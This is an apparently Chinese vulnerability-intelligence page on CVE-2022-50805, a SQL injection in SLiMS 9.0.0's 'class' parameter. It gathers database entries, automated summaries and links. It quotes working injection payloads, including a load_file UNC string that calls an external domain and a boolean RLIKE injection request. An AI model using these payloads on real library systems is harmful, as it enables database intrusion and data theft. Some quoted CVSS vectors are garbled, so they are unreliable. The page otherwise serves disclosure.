支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:736

73.6%
一、 漏洞 CVE-2022-50805 基础信息
漏洞信息
                                        # Senayan 9.0.0 SQL注入漏洞

N/A
                                        
神龙判断

是否为 Web 类漏洞: 未知

判断理由:

N/A
提示
尽管我们采用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。
神龙会尽力确保数据准确,但也请结合实际情况进行甄别与判断。
神龙祝您一切顺利!
漏洞标题
Senayan Library Management System 9.0.0 - SQL Injection
来源:美国国家漏洞数据库 NVD
漏洞描述信息
Senayan Library Management System 9.0.0 contains a SQL injection vulnerability in the 'class' parameter that allows attackers to inject malicious SQL queries. Attackers can exploit the vulnerability by submitting crafted payloads to manipulate database queries and potentially extract sensitive information.
来源:美国国家漏洞数据库 NVD
CVSS信息
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
来源:美国国家漏洞数据库 NVD
漏洞类别
SQL命令中使用的特殊元素转义处理不恰当(SQL注入)
来源:美国国家漏洞数据库 NVD
漏洞标题
SLiMS 9 Bulian SQL注入漏洞
来源:中国国家信息安全漏洞库 CNNVD
漏洞描述信息
SLiMS 9 Bulian是印度尼西亚SLiMS社区的一个免费的开源软件。用于图书馆资源管理(如书籍、期刊、数字文档和其他图书馆资料)和管理。 SLiMS 9 Bulian 9.0.0版本存在SQL注入漏洞,该漏洞源于class参数存在SQL注入漏洞,可能导致提取敏感信息。
来源:中国国家信息安全漏洞库 CNNVD
CVSS信息
N/A
来源:中国国家信息安全漏洞库 CNNVD
漏洞类别
SQL注入
来源:中国国家信息安全漏洞库 CNNVD
二、漏洞 CVE-2022-50805 的公开POC
#POC 描述源链接神龙链接
三、漏洞 CVE-2022-50805 的情报信息
  • 标题: Senayan Library Management System v9.0.0 - SQL Injection - PHP webapps Exploit -- 🔗来源链接

    标签:exploit

    神龙速读:
                                            ## 关键漏洞信息
    
    ### 基本信息
    - **EDB-ID:** 51161
    - **CVE:** N/A
    - **Author:** NU11SECUR1TY
    - **Type:** WEBAPPS
    - **Platform:** PHP
    - **Date:** 2023-03-31
    - **Vulnerable App:** Senayan Library Management System v9.0.0
    
    ### 漏洞详情
    - **Description:**
      - 手动插入点 `3` 的 `class` 参数似乎对 SQL 注入攻击易受攻击。
      - 使用的负载为:`'+(select load_file('\\\\\\0absu0byc9uwy8ivftx7f6auul0fo5cwfk6at2hr.again.com\\fbe'))+`。该负载在手动插入点 `3` 提交。该负载注入了一个调用 MySQL 的 `load_file` 函数的 SQL 子查询,该函数具有引用外部 URL 的 UNC 文件路径。
    
    - **Reproduce URL:**
      - [https://github.com/nu11sc3/Sc3-vulnerable/tree/main/friends](https://github.com/nu11sc3/Sc3-vulnerable/tree/main/friends)
    
    - **Proof and Exploit URL:**
      - [http://localhost:5001/sy5wji](http://localhost:5001/sy5wji)
    
    - **Time spent:** `03:00:00`
    
    ### 其他信息
    - **References:**
      - Vendor: [https://slims.web.id/web/](https://slims.web.id/web/)
      - Software: [https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip](https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip)
      - Advisory/Source: [https://github.com/nu11sc3/Sc3-vulnerable/tree/main/friends](https://github.com/nu11sc3/Sc3-vulnerable/tree/main/friends)
                                            
    Senayan Library Management System v9.0.0 - SQL Injection - PHP webapps Exploit
  • 标题: CVE-nu11secur1ty/vendors/slims.web.id/SLIMS-9.0.0/SQLi at main · nu11secur1ty/CVE-nu11secur1ty · GitHub -- 🔗来源链接

    标签:technical-description

    神龙速读:
                                            ## 关键漏洞信息
    
    ### 漏洞类型
    - SQL注入
    
    ### 软件
    - SLiMS 9.0.0
    
    ### 漏洞描述
    The manual insertion `point 3` with the `class` parameter appears to be vulnerable to SQL injection attacks. The payload `'+(select load_file('\\\\0absu0byc9uwy8ivftx7f6auul0fo5cwfka61at2hr.again.com.legend\\')+` was submitted in manual insertion point 3. This payload injects a SQL sub-query that calls MySQL's `load_file` function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.
    
    ### 漏洞状态
    - HIGH Vulnerability
    
    ### Payload示例
    ```sql
    reportView=true&year=2002&class=bbbb''' RLIKE (SELECT (CASE WHEN (2547=2547) THEN 0x626262622 ELSE 0x636363635 END)) AND 'kco'='kco
    ```
    
    ### Reproduce和Exploit
    - 提供了相关链接,用于复现和利用漏洞。
    
    ### 漏洞发现时间
    - 3小时
                                            
    CVE-nu11secur1ty/vendors/slims.web.id/SLIMS-9.0.0/SQLi at main · nu11secur1ty/CVE-nu11secur1ty · GitHub
  • 标题: SLiMS - Senayan Library Management System - Beranda -- 🔗来源链接

    标签:product

    神龙速读:
                                            从网页截图中可以看到以下关于漏洞的关键信息:
    
    - SLiMS 9 Bulian 版本当前可供下载。
    - 提供了 SLiMS 的多个下载选项,包括便携式版本(Portable SLiMS)和源代码。
    - 列出了 SLiMS 的系统要求:
      - Apache web server 版本 2.4
      - MySQL 5.7 或 MariaDB 10.3 或更高版本
      - PHP 8.3
      - PHP GD 扩展启用
      - PHP gettext 扩展启用
      - PHP mbstring 扩展启用
      - 可选 phpMyAdmin 和 Adminer
    
    虽然这些信息本身并不直接说明存在漏洞,但过时的软件版本或未启用必要的扩展可能会引入安全风险。建议定期更新软件和依赖项,并遵循最佳安全实践。
                                            
    SLiMS - Senayan Library Management System - Beranda
  • 标题: Senayan Library Management System 9.0.0 - SQL Injection | Advisories | VulnCheck -- 🔗来源链接

    标签:third-party-advisory

    神龙速读:
                                            从这个网页截图中可以获取到关于漏洞的关键信息如下:
    
    - **漏洞名称**: Senayan Library Management System 9.0.0 - SQL Injection
    - **严重性**: High (高)
    - **日期**: January 13, 2026
    - **受影响的系统**: Senayan Library Management System 9.0.0
    - **漏洞类型**: CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
    - **CVSSv3.1 评分**: 8.1
    - **CVSSv3.1 向量字符串**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/SC:H/CI:H/I:H/A:H
    - **风险等级**: S:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
    - **参考链接**:
      - ExploitDB-51161
      - Senayan Library Management System Official Website
      - Vulnerability Research Repository
    - **发现者**: nu11secur1ty
    - **描述**: Senayan Library Management System 9.0.0 在'class'参数中存在SQL注入漏洞,允许攻击者注入恶意SQL查询。攻击者可以通过提交精心设计的有效载荷来操纵数据库查询并潜在地提取敏感信息。
                                            
    Senayan Library Management System 9.0.0 - SQL Injection | Advisories | VulnCheck
  • https://nvd.nist.gov/vuln/detail/CVE-2022-50805
四、漏洞 CVE-2022-50805 的评论
匿名用户
2026-01-15 06:09:08

Zaproxy alias impedit expedita quisquam pariatur exercitationem. Nemo rerum eveniet dolores rem quia dignissimos.


发表评论